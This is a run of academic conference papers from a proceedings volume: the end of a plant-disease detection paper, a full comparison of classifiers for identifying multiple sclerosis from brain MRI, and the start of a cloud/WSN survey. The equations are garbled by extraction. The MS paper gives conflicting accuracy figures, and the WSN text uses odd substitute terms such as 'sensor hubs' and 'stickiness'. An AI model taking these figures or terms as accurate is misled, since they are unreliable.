Fig. 5 Performance comparison between db4 wavelet and bior1.5 wavelet for a sub-band selection
and, b decomposition level selection
A Novel DWT and Deep Learning Based … 365

Table 1 Accuracy
Approaches Accuracy (%)
comparison of performance
among the current approaches Ghazal and Mahmoud et al. [6] 90
and proposed approach Hassanein and Gaber et al. [9] 90.5
Yao and Chen et al. [11] 90.7
Han and Shi et al. [3] 91.3
Ma and Du et al. [8] 93.4
Veerashetty and Patil et al. [4] 95
Xio and Ma et al. [7] 95.83
Mondal and Kole et al. [10] 96.78
Thanjavur et al. [5] 98.63
DWT-DNN (Proposed approach) 98.96

3.5 Comparison of Accuracy with State-of-Art Approaches


with Proposed Approach

The comparison between different approaches was made on the basis of the highest
accuracy achieved as shown in Table 1. The colored images were used in the proposed
approach while the other approaches converted the images into gray-scale images
for easy computation. The other approaches used the only available resolution of
the images, but the proposed approach used the multi-resolution analysis to deter-
mine the best level at which the least memory was required by the system to process
the images. The system performed well with no high-end GPU installed in it. The
other approaches used the SVM, KNN, decision trees and other classification tech-
niques which proved to be lesser accurate in comparison with the proposed approach
classification techniques, i.e., DNNs.
It was observed that the proposed approach produced the highest accuracy among
the existing approaches, i.e., 98.96% as demonstrated in Fig. 6.

4 Conclusion

The proposed technique is a novel feature extraction technique which is based on


DWT and deep learning for identification of diseases in plants which was performed
on the 400 images of Grape dataset of Plant village database. The feature extraction
was accomplished using multi-resolution analysis of the images using DWT with
two different orthogonal wavelets namely db4 and bior1.5. The sub-band selection
and decomposition level selection had been made to determine the best parameters
for the better accuracy. The computed parameters were then passed for dimensional
reduction using PCA. The robust features were computed using PCA, and the training
images were passed to different DNNs. The highest accuracy was achieved by Incep-
tion V3 in majority of the cases. The sub band cA and decomposition level 1 were best
366 Kirti et al.

Fig. 6 Performance comparison between different approaches

suited for the system. The db4 wavelet performed better than the bior 1.5 wavelet.
The accuracy achieved by the system was 98.96%. The system handled large dataset
very efficiently, whereas the existing Machine learning techniques could not perform
well with large datasets. In future, different families of wavelets will be explored and
examined using different datasets for plant disease identification.

References

1. Giraddi, S., Desai, S., & Deshpande, A. (2020). Deep learning for agricultural plant disease
detection. In lecture notes in electrical engineering (pp 864–871). Springer.
2. Bisen, D. (2020). Deep convolutional neural network based plant species recognition through
features of leaf. Multimed Tools Applications 1–14. https://doi.org/10.1007/s11042-020-100
38-w.
3. Han, J., Shi, L., Yang, Q., et al. (2020). Real-time detection of rice phenology through convo-
lutional neural network using handheld camera images. Precision Agriculture. https://doi.org/
10.1007/s11119-020-09734-2
4. Veerashetty, S., & Patil, N. B. (2020). Novel LBP based texture descriptor for rotation, illumina-
tion and scale invariance for image texture analysis and classification using multi-kernel SVM.
Multimed Tools Applications, 79, 9935–9955. https://doi.org/10.1007/s11042-019-7345-6
5. Gayathri Devi, T., & Neelamegam, P. (2019). Image processing based rice plant leaves diseases
in Thanjavur, Tamilnadu. Cluster Computing, 22, 13415–13428. https://doi.org/10.1007/s10
586-018-1949-x
6. Ghazal, M., Mahmoud, A., Shalaby, A., El-Baz, A. (2019). Automated framework for accu-
rate segmentation of leaf images for plant health assessment. Environmental Monitoring and
Assessment, 191. https://doi.org/10.1007/s10661-019-7615-9
7. Xiao, M., Ma, Y., Feng, Z., et al. (2018). Rice blast recognition based on principal component
analysis and neural network. Computers and Electronics in Agriculture, 154, 482–490. https://
doi.org/10.1016/j.compag.2018.08.028
A Novel DWT and Deep Learning Based … 367

8. Ma, J., Du, K., Zheng, F., et al. (2018). A recognition method for cucumber diseases using leaf
symptom images based on deep convolutional neural network. Computers and Electronics in
Agriculture, 154, 18–24. https://doi.org/10.1016/j.compag.2018.08.048
9. Hassanien, A. E., Gaber, T., Mokhtar, U., & Hefny, H. (2017). An improved moth flame
optimization algorithm based on rough sets for tomato diseases detection. Computers and
Electronics in Agriculture, 136, 86–96. https://doi.org/10.1016/j.compag.2017.02.026
10. Mondal, D., Kole, D. K., & Roy, K. (2017). Gradation of yellow mosaic virus disease of okra
and bitter gourd based on entropy based binning and Naive Bayes classifier after identification
of leaves. Computers and Electronics in Agriculture, 142, 485–493. https://doi.org/10.1016/j.
compag.2017.11.024
11. Yao, Q., Chen. G. te, Wang, Z., et al. (2017). Automated detection and identification of white-
backed planthoppers in paddy fields using image processing. Journal of Integrative Agriculture,
16, 1547–1557. https://doi.org/10.1016/S2095-3119(16)61497-1
12. Kirti, Rajpal, N., & Arora, M. (2021). Comparison of texture based feature extraction tech-
niques for detecting leaf scorch in strawberry plant (Fragaria × Ananassa). In A. Kumar, S.
Mozar (Eds.), Lecture notes in electrical engineering. ICCCE 2020. Lecture Notes in Electrical
Engineering (Vol. 698, pp 659–670). Springer.
13. Revathi, P., & Hemalatha, M. (2014). Cotton leaf spot diseases detection utilizing feature
selection with skew divergence method. International Journal of Science, Engineering and
Technology, 3, 22–30.
14. Zhou, R., Kaneko, S., Tanaka, F., et al. (2015). Image-based field monitoring of Cercospora
leaf spot in sugar beet by robust template matching and pattern recognition. Computers and
Electronics in Agriculture, 116, 65–79. https://doi.org/10.1016/j.compag.2015.05.020
15. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent & Fuzzy Systems, 35, 5265–5277. https://doi.org/10.3233/JIFS-169810
16. Yadav, J., Rajpal, N., & Vishwakarma, V. (2016) Face recognition using Symlet, PCA and
Cosine angle distance measure. In 2016 Ninth International Conference on Contemporary
Computing (IC3), Noida, U.P.
17. Yadav, J., Rajpal, N., & Mehta. R. (2019). An improved illumination normalization and robust
feature extraction technique for face recognition under varying illuminations. Arabian Journal
for Science and Engineering, 44, 9067–9086.
18. Lumini, A., & Nanni, L. (2019). Deep learning and transfer learning features for plankton
classification. Ecological Informatics, 51, 33–43. https://doi.org/10.1016/j.ecoinf.2019.02.007
19. GitHub—spMohanty/PlantVillage-Dataset: Dataset of diseased plant leaf images and corre-
sponding labels. https://github.com/spMohanty/PlantVillage-Dataset. Accessed 11 December
2020
Supervised and Unsupervised Machine
Learning Techniques for Multiple
Sclerosis Identification: A Performance
Comparative Analysis

Shikha Jain, Navin Rajpal, and Jyotsna Yadav

Abstract The identification of multiple sclerosis disease (MSD) is very crucial


because it is a neurological disease in young people where an early detection is recom-
mended. Accurate classification and segmentation using distinct machine learning
techniques plays significant role in identifying MSD based on brain magnetic reso-
nance (MR) images. In this work, a performance comparative analysis of various
supervised and unsupervised machine learning techniques on eighteen gray level
textural feature matrix (GLTFM) of brain MR images has been performed. Super-
vised machine learning (k-nearest neighbor, support vector machine and ensemble
learning) classification techniques are utilized for MSD identification and compared
with unsupervised machine learning-based clustering techniques (k-mean clustering
and Gaussian mixture model). Accuracy has been evaluated for measuring proposed
system’s execution on unhealthy brain magnetic resonance (MR) images from the
e-health dataset and healthy control brain magnetic resonance (MR) images from
private clinical dataset. These metrics are also compared with various state-of-
the-art techniques. It has been verified that MSD identification from healthy and
unhealthy brain MR images based on the proposed methodology using supervised
machine learning techniques yields accuracy of 96.55% which is better than existing
state-of-the-art techniques and unsupervised machine learning techniques.

Keywords Gray level textural feature matrix (GLTFM) · Magnetic resonance


imaging (MRI) · Multiple sclerosis disease (MSD) · Supervised machine learning
techniques · Unsupervised

S. Jain · N. Rajpal · J. Yadav (B)


University School of Information, Communication and Technology, Guru Gobind Singh
Indraprastha University, Delhi, India
e-mail: jyotsnayadav@ipu.ac.in
S. Jain
e-mail: shikha.15316490019@ipu.ac.in
N. Rajpal
e-mail: navin.rajpal@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 369
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_30
370 S. Jain et al.

1 Introduction

Multiple sclerosis is a disseminating illness, in which the immune system of the body
is severely affected, and the antibodies are directly attacked and cause communica-
tion breakdown between brain and other parts of the body. Eventually, the disorder
originates lifelong damage or worsening of the veins. Multiple sclerosis indication
includes: pain, fatigue, lack of coordination between brain and other parts of the
body. Various researchers are working in the domain of MSD identification segmen-
tation as well as classification of MS lesion in brain MR image. Machine learning
performance is good in identification and segmentation task of brain MR images to
find neurological diseases like a tumor, MSD, Alzheimer’s disease, etc.
In 2018, a GLCM-based classification of brain MR image using feed-forward
neural network has been proposed with 10 folds cross-validation with an accuracy
of 92.75% [1]. Using Adaboost with random forest-based classification on different
datasets using two-dimensional discrete wavelet transform for feature extraction and
probabilistic principal component analysis (PPCA) for dimensionality reduction has
been suggested by [2]. In 2009, Haar wavelet transform along with PCA has been
proposed by [3]. A multilayer perceptron along with modified Jaya algorithm has
been proposed by [4]. In 2016, KPCA (kernel PCA) with bioorthogonal wavelet along
with logistic regression has been proposed by [5]. In 2018, a convolution neural
network with dropout approach was given by [6]. MS patient characterization using
support vector machine with an accuracy of 89.2% was given by Zurita et al. [7].
A threshold-based approach for the segmentation task of multiple sclerosis brain
magnetic resonance image was given by Valcarcel et al. [8]. An automated technique
for the identification and segmentation of MS lesion has been given by Roy et al.
[9]. Different approach for the identification and segmentation of MS lesion and the
classification of healthy brain MR image from unhealthy brain has been given by
[10]. The above literature highlights the fact that different machine learning tech-
niques have been utilized successfully for MSD identification on brain MR images.
However, in order to compare and analyze performance of various supervised and
unsupervised machine learning techniques for MSD identification, a reinvestigation
has been carried out using distinct performance metrics on brain MR images. The
key points in this work are mentioned as:
1. Eighteen textural features are utilized on brain MR image for generating feature
vector and fed to KNN, SVM, ensemble-based classifier and K-mean, Gaussian
mixture model (GMM)-based clustering model.
2. The results of three classifiers and two clustering techniques on different param-
eters for MSD identification has been tested to find the best accuracy on e-health
dataset [11–15] and private clinical dataset [16].
3. Observed results are examined and matched with other techniques.
The paper is resumed as follows. Section 2 gives the thorough explanation of given
approach, and brief overview of techniques has been addressed. Section 3 gives the
experimental results, and Sect. 4 presents the conclusion.
Supervised and Unsupervised Machine Learning Techniques … 371

2 Proposed Approach

This methodology is of three stages as shown in Fig. 1. First, preprocessing of


healthy and non-healthy (person suffering from multiple sclerosis disease) brain
MR image has been done to boost the image quality. The dataset consists of 192
images in which 110 are healthy images and 82 are non-healthy images. 85% images
are taken into training dataset and 15% images into testing dataset. Second step
is feature extraction in which eighteen features retrieved using gray level textural
feature matrix. Third step is classification of unhealthy image from healthy images
using supervised and unsupervised classifiers (supervised-KNN, SVM, ensemble,
unsupervised k-mean clustering, Gaussian mixture model). Performance has been
analyzed based on various factors of each classifier, and it has been verified that
supervised approach SVM on polynomial kernel function gives the highest accuracy.

2.1 Image Preprocessing

Firstly, the skull part of brain magnetic resonance images in both the training and
test dataset has been extracted using adobe illustrator software. All the images in the
training and test dataset have been resized into 64 × 64 using bilinear interpolation.
In the next step, all the images has been converted into grayscale. Contrast-limited
adaptive histogram equalization method is utilized for improvement of contrast in
training and test dataset images. Afterwards, gamma correction has been used to
control the brightness of the image.

Training Textural
Brain Feature
Images
MRI Image Extraction
(85%)
(Healthy+
Unhealthy)
Image
Preprocessing Testing Supervised and
Images Unsupervised
(15%) Classification

Performance Comparative
Analysis of Accuracy

Fig. 1 Block diagram of multiple sclerosis identification based on gray level textural feature matrix
(GLTFM) using supervised and unsupervised machine learning techniques
372 S. Jain et al.

2.2 Feature Extraction Through Gray Level Textural Feature


Matrix (GLTFM)

Gray level textural feature matrix computes second-order textural features of an


image. First, from the input image, co-occurrence matrix is build and then normal-
ization of co-occurrence matrix has been computed to get eighteen textural features.
Co-occurrence matrix (CM) depicts how many occurrence of pairs of same gray level
occurs in the image matrix. Symmetric matrix has been formed by adding CM with
its transpose. Then, normalized matrix is computed by dividing every element of
symmetric matrix by sum of all the elements of symmetric matrix. x(i, j) is the value
of ith row and jth column in normalized co-occurrence matrix. N g is different gray
values in image matrix. μ is the mean, and σ is the standard deviation from normal-
ized matrix. i, j refers to normalized matrix value, whereas y, z refers to textural
feature matrix values. Eighteen textural features are mentioned in Table 1.

2.3 Classification

To classify unhealthy (MS brain MRI image) from healthy (normal brain MRI image),
five different classification techniques have been used for comparing the results of
MSD identification as discussed in forthcoming section.

Supervised Machine Learning Approach


KNN (K-Nearest Neighbor). K-nearest neighbor classification [17] expresses that the
test data points are allocated to its nearest neighbor class between the two classes
(healthy/unhealthy). Distance measures has been used to find the separation between
weights corresponding to test set brain MR image (test MR images) and known brain
MR image (training MR images). In this study, we have utilized Cosine distance as
well as Euclidean distance. Let m and n as eigen feature vectors of length ‘p’ then
Euclidean distance (1) and cosine distance (2) can be computed as:

p
Deuclidean = (m i − n i )2 (1)
i=0
p
m i ni
Dcosine = − cos(m, n) =  i=1
n (2)
p 2
i=1 mi i=1 n i2

The minimum distance has been used to calculate the nearest neighbor of a test
brain magnetic resonance image.
SVM (Support Vector Machine). SVM is a hypothesis that analyzes data identifi-
cation patterns and then used for classification problems. The classification problem
can be restricted to examination of the two-class problem. For each given input, the
Supervised and Unsupervised Machine Learning Techniques … 373

Table 1 Eighteen gray level textural features of brain magnetic resonance image
Entropy (ENT) = It is mathematical changeability that describes the

− i, j x(i, j) log(x(i, j) texture of image

Energy (ENE) = x(i, j)2 It is the rate of change in the magnitude of the pixels
value over nearby areas
 x(i, j)
Homogeneity (HOM) = i, j 1+(i− j)2 It measured the proximity of the distribution of
elements in the matrix to the diagonal element
Contrast (CONT) = It gives gray level contrast between a pixel and its
 neighboring pixel value over the entire image
i, j |i − j| x(i, j)
2

Correlation (CORR) = It gives an amount of how correlated a gray level value



i, j (i−μi )( j−μ j )x(i, j) to its neighboring pixel value over the entire image
σi σ j

Sum of square Variance (SSV) = It computes the dissipation with respect to the mean of
 gray level distribution
i, j (i − μ) x(i, j)
2

Inverse Difference Moment (IDM) = It is a measure of local Homogeneity


 x(i, j)
i, j 1+(i− j)2

Angular second moment (ASM) = It is a measure of textural uniformity of an image



i, j {x(i, j)}
2

Sum average (SUMA) = It is average sum of all the features


2N g
i=2 i x y+z (i)
Sum Entropy (SENT) = It is the total amount of entropies of all the features
2N g
i=2 x y+z (i) log{, x y+z (i)}
Sum Variance (SUMV) = It is sum of variances of all the features
2N g
i=2 (i − S E N T ) x y+z (i)
2

Cluster Shade (CS) = It is the lack of symmetry in the image



{i + j − μx − μ y }3∗ x(i, j)
i, j

Difference Entropy (DIFFENT) = It is difference of entropies of all the features


N g
i=0 x y+z (i) log{x y+z (i)}
Cluster prominence (CP) = It is measure of the skewness of the matrix

i, j {i + j − μ y − μz }∗ x(i, j)
4

Difference variance (DIFFV) = It is difference of variances of all the features


N g
i=0 (i − SUMENT) x y+z (i)
2

Maximum probability (MAXPROB) = It shows the appearance of the gray level value xi
max x(i, j) adjacent to the gray level value xj more supreme in the
image
Autocorrelation (AUTOCORR) = It is described as a closeness measure between dataset
   and shifted copy of dataset
i j i. j.x(i, j)

(continued)
374 S. Jain et al.

Table 1 (continued)
Entropy (ENT) = It is mathematical changeability that describes the

− i, j x(i, j) log(x(i, j) texture of image
Dissimilarity (DISS) = It is variation of gray level pairs
  
i j |i. − j|.x(i, j)

SVM determines whether the input is a member of a healthy brain MR image or a


non-healthy MS patient’s brain MR image.
First, the feature vector of all the training images represented as a unique point
in a space. x ∈ R D . After the representation of feature vector in the feature space,
a decision boundary line separating these points into their respective classes has
been generated. The hyper plane equation dividing the points (for classifying) is:
H : w T (x) + b, where b is the bias term, w is the slope. The transformed nonlinear
feature space for input feature is M(x) : R D → R M , and the distance between the
feature point vector and the hyperplane equation is w T M(x) + b = 0. Similarly the
distance of a hyperplane equation w T M(x) + b = 0 from a given point vector M(x 0 )
is mentioned in Eq. 3

w T (M(x0 )) + b
d H (M(x0 )) = (3)
w2

The goal is to maximize the minimum distance as mentioned in Eq. 4



w ∗ = arg max min d H (M(x0 )) (4)
n

The product of a predicted and actual label is greater than zero on correct predic-
tion, otherwise less than zero. The kernel function takes data as input and changes
it into the desirable form. Three kernel functions (radial basis function, linear and
polynomial) were utilized to find the best accuracy rate of 96.55% with a polynomial
kernel function.
Ensemble Learning. Ensemble learning is the technique that combines different
classifiers having some error rate and to get a resulting approach in which the error
rate is small. In this proposed work, decision tree with four different boosting and
bagging algorithms (AdaboostM1, LPBoost, logitBoost, RUSBoost and Bagging)
has been implemented to do the binary classification task that separates the healthy
brain from the unhealthy brain (multiple sclerosis) MR classes. In decision tree, a
large number of trees are built and each tree chooses a class, and the class which
receives the most votes by a simple majority is the predicted class. The label 0,
1 denotes normal as well as abnormal classes. Then, it gave a signal to learning
algorithm n number of times, and in all rounds, a training weight is allocated to
each training sample. At the start of the algorithm, all the weights for each training
example were the same, and in the subsequent rounds, the weight of incorrectly
Supervised and Unsupervised Machine Learning Techniques … 375

classified objects has been enhanced to target on tough objects in the training set.
Lastly, a strong approach is constructed. Decision tree with LPboost gives the highest
accuracy rate of 82.75%.

Unsupervised Machine Learning Techniques


K-mean clustering. K-mean clustering is unsupervised approach which divides obser-
vation into k clusters. The algorithm consists of two stages. The first stage selects k
centers at random. The next stage is to take every feature set to the closest center.
Cityblock distance is the distance between each class and the cluster centers, and it
gives the highest accuracy as compared to cosine distance.
Cityblock distance is the summation of absolute difference between 2-coordinates.
The cityblock distance of 2-points m and n with p dimension is mathematically
calculated using formula as mentioned in Eq. (5)


p
disti j = |m i − n i | (5)
i=1

When all the feature groups are incorporated in some clusters, the first step
is completed, and an early grouping is done reevaluating the average of the first
formed clusters. This recursive process continues until the criterion function becomes
minimum.
Gaussian Mixture Model. GMM is also an unsupervised algorithm for classifi-
cation of healthy brain MR image from non-healthy MR image. It is a probabilistic
model that uses smooth clustering technique for spreading the feature points into
different clusters. For a set of data location, GMM would identify the likelihood of
each data point that belongs to each of these distributions. Expectation-maximization
is the base of GMM. Let μ1 μ2 are the mean, σ1 σ2 are the covariance values of cluster
1 and cluster 2, respectively. The density of the distribution is ρi . First random assign-
ment to these values has been done, and after that, to find the values of the parame-
ters for defining the Gaussian distribution, expectation-maximization step has been
performed.
E Step—For each data point xi , calculate the probability that it belongs to
cluster/distribution c1 , c2 . This is done using the formula in Eq. (6)

Probability of xi belongs to cluster c


ric = (6)
Sum of probability xi belongs to c1 c2

The value will be high if point is assigned to right cluster; otherwise, it is low.
M Step—Updation of μ, σ and ρ will be done. These are updated using Eq. (7–9)
as mentioned below.
No. of points assigned to the cluster
ρ= (7)
Total number of points
376 S. Jain et al.

The mean and the covariance matrix are updated based on the assigned values to
the distribution, in proportion with the probability values for the data point.

i ric ∗ x i
μ= (8)
No. of points assigned to the cluster

i ric (x i − μc ) (x i − μc )
T
σc = (9)
No. of points assigned to the cluster

3 Experimental Results

To examine the proposed system’s performance, experiments have been done on


an e-health dataset and private clinical dataset, consisting of 82 unhealthy brain
MRI images from e-health [11–15], i.e., images of a person suffering from multiple
sclerosis disease and 110 healthy control brain MRI images from private hospital
[16] for a total of 192 images.
The size of each image has a dimension of 512 × 512 with a resolution of 57 dpi.
The experiments are carried out in MATLAB R2020a. Proposed work was performed
on computer having Intel core i5 processor, 2.5 GHz CPU and a RAM of 4 GB. 85%
random images from the dataset have been used for training purposes, i.e., 94 healthy
images and 69 unhealthy images (Table 2).

3.1 No. of neighbor’s Selection and Distance Metric


Selection in K-nearest Neighbor Classification

In this section, accuracy is analyzed on a different number of neighbors and two


different distance metrics (cosine and Euclidean). It has been analyzed that using
Euclidean distance measure with one number of neighbor gives the highest accuracy
of 96.55% for the classification of healthy brain MR image from unhealthy brain
MR image, as illustrated in Table 3.

Table 2 Dataset used for experimental analysis


Training images (85%) Testing images (15%) Total
Healthy Unhealthy Healthy Unhealthy
94 69 16 13 192
Supervised and Unsupervised Machine Learning Techniques … 377

Table 3 Highest accuracy


Classification model Accuracy (%)
achieved using KNN classifier
KNN_EUC_1 96.55
KNN_COS_1 93.1

Table 4 Highest accuracy


Classification model Accuracy (%)
achieved using SVM classifier
SVM_Auto_polynomial 96.55
SVM_0.0015_RBF 55.9
SVM_Auto_linear 93.1

3.2 Kernel Function Selection and Kernel Scale Selection


in Support Vector Machine

In this section, accuracy is analyzed on different kernel scales and three kernel func-
tions (radial basis function, linear and polynomial). It has been analyzed from Table
4 that the heuristic approach of kernel scale selection gives the best results. The
polynomial kernel gives the highest accuracy (96.55%) as compared to radial basis
function (48.27%) and linear kernel function (93.1%) with a heuristic approach for
identification of the kernel scale as illustrated in Table 4.

3.3 Selection of Boosting Method and Learning Cycles


in Decision Tree Classifier (Ensemble Learning)

In this, accuracy is analyzed on different learning cycles with four different boosting
methods (AdaboostM1, Logitboost, LPboost and RUSboost) and bagging method.
It has been analyzed that Adaboost and logitBoost will give the highest accuracy
(82.75%) with 300 and 500 learning cycles, respectively (Table 5).

Table 5 Highest accuracy


Classification model Accuracy (%)
achieved using ensemble
classifier ENSMBL_LogitBoost_500 82.75
ENSMBL_LPBoost_100 75.86
ENSMBL_AdaBoost_300 82.75
378 S. Jain et al.

Table 6 Performance of
Classification model Accuracy (%)
unsupervised techniques
K-mean clustering 75.86
Gaussian mixture model 72.41

Fig. 2 Accuracy of
K-nearest neighbor on
different distance measures

3.4 Unsupervised Learning Approach Using K-mean


and Gaussian Mixture Model (GMM) Clustering

Comparison of unsupervised approach for MS classification using k-mean and


Gaussian mixture model approach is shown Table 6.

3.5 Comparison of Proposed Technique with Earlier Studies

Comparison of different classifier on different dataset is shown in Table 7. Our


proposed work gets an accuracy of 96.55% with KNN and SVM as a classifier.
Supervised and Unsupervised Machine Learning Techniques … 379

Fig. 3 Accuracy of SVM on


different kernel scale. Here
on x axis, 1—Auto,
2—0.0015, 3—0.0132,
4—0.098

Fig. 4 Accuracy of
ensemble on different
learning cycles

4 Conclusion

This paper proposed the performance comparative analysis on classification accu-


racy of supervised and unsupervised machine learning approach for multiple scle-
rosis disease identification. The experiments are carried out on an e-health dataset,
380 S. Jain et al.

Table 7 Performance comparative analysis with earlier studies


State-of-the-art feature extraction technique for MSD Classifier Accuracy (%)
identification
GLCM [1] FFNN 92.75
Haar Wavelet + PCA [3] Logistic regression 89.72
Gray matter [18] Random forest 92
GLCoM [19] Ensemble 82.75
Gray level textural feature KNN_COS_1 92.31
Gray level textural feature KNN_EUC_1 96.3
Gray level textural feature Ensemble 75.86
Gray level textural feature SVM_Linear_auto 93.1
Gray level textural feature SVM_RBF_0.013 55.17
Gray level textural feature K-mean 75.86
Gray level textural feature GMM 72.41
Proposed gray level textural features Support vector machine 96.55

consisting of 110 healthy control brain MRI images from private clinical dataset and
82 unhealthy (multiple sclerosis) brain MRI images from e-health dataset. Eighteen
textural features have been extracted after preprocessing of brain magnetic reso-
nance images. It has been verified that supervised learning approach outperforms
unsupervised approach. The K-nearest neighbor classifier and polynomial kernel-
based support vector machine (SVM) give highest accuracy of 96.55% as compared
to unsupervised approach. In future work, different feature extraction techniques
will be analyzed on different classification models, and also comparative study with
convolution neural network will be analyzed for the identification task of multiple
sclerosis disease from brain magnetic resonance images.

References

1. Zhou, Q., & Shen, X. (2018). Multiple sclerosis identification by grey-level cooccurrence
matrix and biogeography-based optimization. In 2018 IEEE 23rd International Conference on
Digital Signal Processing (DSP), Shanghai, China (pp. 1–5). https://doi.org/10.1109/ICDSP.
2018.8631873
2. Nayak, D. R., Dash, R., & Majhi, B. (2016). Brain MR image classification using two-
dimensional discrete wavelet transform and AdaBoost with random forests. Neurocomputing,
177, 188–197. ISSN 0925-2312, https://doi.org/10.1016/j.neucom.2015.11.034
3. Wu, X., Lopez, M. (209). Multiple sclerosis slice identification by haar wavelet transform and
logistic regression. In Advances in materials, machinery, electrical engineering (AMMEE 209).
Atlantis Press. https://doi.org/10.2991/ammee-17.2017.10
4. Wang, S.-H., Cheng, H., Phillips, P., & Zhang, Y.-D. (2018). Multiple sclerosis identification
based on fractional fourier entropy and a modified Jaya algorithm. Entropy, 20, 254. https://
doi.org/10.3390/e20040254
Supervised and Unsupervised Machine Learning Techniques … 381

5. Wang, S., et al. (2016). Multiple sclerosis detection based on biorthogonal wavelet transform,
RBF kernel principal component analysis, and logistic regression. IEEE Access, 4, 7567–7576.
https://doi.org/10.1109/ACCESS.2016.2620996
6. Zhang, Y. -D., et al. (2018). Multiple sclerosis identification by convolutional neural network
with dropout and parametric ReLU. Journal of Computational Science, 28, 1–10. https://doi.
org/10.1016/j.jocs.2018.07.003
7. Zurita, M., Montalba, C., Labbé, T., Cruz, J. P., da Rocha, J. D., Tejos, C., Ciampi, E.,
Cárcamo, C., Sitaram, R., Uribe, S. (2018). Characterization of relapsing-remitting multiple
sclerosis patients using support vector machine classifications of functional and diffusion MRI
data. NeuroImage: Clinical, 20, 724–730. ISSN 2213-1582, https://doi.org/10.1016/j.nicl.2018.
09.002
8. Valcarcel, A. M. et al. (2020). TAPAS: A thresholding approach for probability map automatic
segmentation in multiple sclerosis. NeuroImage. Clinical 27, 102256. https://doi.org/10.1016/
j.nicl.2020.102256
9. Roy, S., et al. (2017). An effective method for computerized prediction and segmentation of
multiple sclerosis lesions in brain MRI. Computer Methods and Programs in Biomedicine, 140,
307–320. https://doi.org/10.1016/j.cmpb.2017.01.003
10. Shanmuganathan, M., et al. (2020). Review of advanced computational approaches on multiple
sclerosis segmentation and classification. IET Signal Processing, 14(6), 333–341. https://doi.
org/10.1049/iet-spr.2019.0543
11. e-health dataset. http://www.medinfo.cs.ucy.ac.cy/
12. Loizou, C. P., Murray, V., Pattichis, M. S., Seimenis, I., Pantziaris, M., & Pattichis, C. S.
(2011). Multi-scale amplitude modulation-frequency modulation (AM-FM) texture analysis
of multiple sclerosis in brain MRI images. IEEE Transactions on Information Technology in
Biomedicine, 15(1), 119–129.
13. Loizou, C. P., Kyriacou, E. C., Seimenis, I., Pantziaris, M., Petroudi, S., Karaolis, M., &
Pattichis, C. S. (2013). Brain white matter lesion classification in multiple sclerosis subjects
for the prognosis of future disability. Intelligent Decision Technologies Journal (IDT), 7, 3–10.
14. Loizou, C. P., Pantziaris, M., Pattichis, C. S., & Seimenis, I. (2013). Brain MRI image
normalization in texture analysis of multiple sclerosis. Journal of Biomedical Graphics and
Computing, 3(1), 20–34.
15. Loizou, C. P., Petroudi, S., Seimenis, I., Pantziaris, M., & Pattichis, C. S. (2015). Quanti-
tative texture analysis of brain white matter lesions derived from T2-weighted MR images
in MS patients with clinically isolated syndrome. Journal of Neuroradiology. Journal de
Neuroradiologie, 42(2), 99–114. https://doi.org/10.1016/j.neurad.2014.05.006(2014)
16. All the healthy brain magnetic resonance image is from radiology department of Safdarjang
Hospital, New Delhi and Subharti Medical College, Meerut.
17. Jyotsna, N. R., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA and cosine
angle distance measure. In 2016 Ninth International Conference on Contemporary Computing
(IC3), Noida (pp. 1–7). https://doi.org/10.1109/IC3.2016.7880231.
18. Eshaghi, A., Wottschel, V., Cortese, R., Calabrese, M., Sahraian, M. A., Thompson, A. J.,
Alexander, D. C., & Ciccarelli, O. (2016). Gray matter MRI differentiates neuromyelitis optica
from multiple sclerosis using random forest. Neurology, 87(23), 2463–2470. https://doi.org/
10.1212/WNL.0000000000003395
19. Jain, S., Rajpal, N., & Yadav, J. (2020) Multiple sclerosis identification based on ensemble
machine learning technique (November 21, 2020). In Proceedings of the 2nd International
Conference on IoT, Social, Mobile, Analytics and Cloud in Computational Vision and Bio-
Engineering (ISMAC-CVB 2020). Available at SSRN https://ssrn.com/abstract=3734806 or
https://doi.org/10.2139/ssrn.3734806
Cloud Computing Overview of Wireless
Sensor Network (WSN)

Mahendra Prasad Nath, Sushree Bibhuprada B. Priyadarshini,


and Debahuti Mishra

Abstract Wireless sensor networks (WSNs) are spatially scattered systems outfitted
with an enormous number of hubs for checking and recording different ecological
conditions like stickiness, temperature, pressure, and thus, helping various condi-
tions and so forth. In this paper, we have started with introducing the WSN and
cloud computing. Next, we have discussed the overview, features, services provided
by cloud computing. Then, we have discussed overview of WSN. Then, we have
discussed application scenarios of cloud computing and WSN. Afterwards, we
concluded the paper.

Keywords Cloud computing · Distributed computing · Internet · Wireless sensor


network

1 Introduction

Correspondence between sensor hubs that use the internet is often a difficult question.
It bodes well to incorporate sensor systems with Internet [1–12]. Simultaneously,
the information of sensor system ought to be accessible at any time through any
way [1]. Allocating addresses to sensor hubs of enormous numbers is perhaps a

M. P. Nath · D. Mishra (B)


Computer Science and Engineering, Siksha ‘O’ Anusandhan Deemed to be University,
Bhubaneswar, Odisha, India
e-mail: debahutimishra@soa.ac.in
S. B. B. Priyadarshini (B)
Computer Science and Information Technology, Siksha ‘O’ Anusandhan Deemed to be
University, Bhubaneswar, Odisha, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 383
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_31
384 M. P. Nath et al.

Fig. 1 Overview of cloud computing and WSN platform

challenging problem. So sensor hub cannot build up association with the network
alone. Distributed processing system also helps the corporate relationship with not so
much problem to lead its middle corporate practices but rather with more conspicuous
profitability. The use of a cloud-like climate can be regulated even more successfully
by countless virtual servers and apps [2].
Figure 1 comprises of WSNs (e.g., WSN1, WSN2 and WSN3), clients and
cloud foundation. Customers are looking for administration in the framework. WSN
consists of physical remote sensor hubs designed to detect various applications,
such as: transport surveillance, climate anticipating, and military usage and so on.
Every sensor hub is modified with the necessary application. Sensor hub addition-
ally comprises of working framework parts and system along with the executive
segments. Application program distinguishes the application on every sensor hub
and authentically sends back to cloud entry via access point or cross-skip via various
center points. Steering convention assumes a fundamental job in dealing with the
system topology and to suit the system elements. Cloud gives on-request adminis-
tration and capacity assets to the customers. It gives access to these assets through
web and proves to be useful when there is an abrupt necessity of assets [3].
Cloud Computing Overview of Wireless Sensor Network (WSN) 385

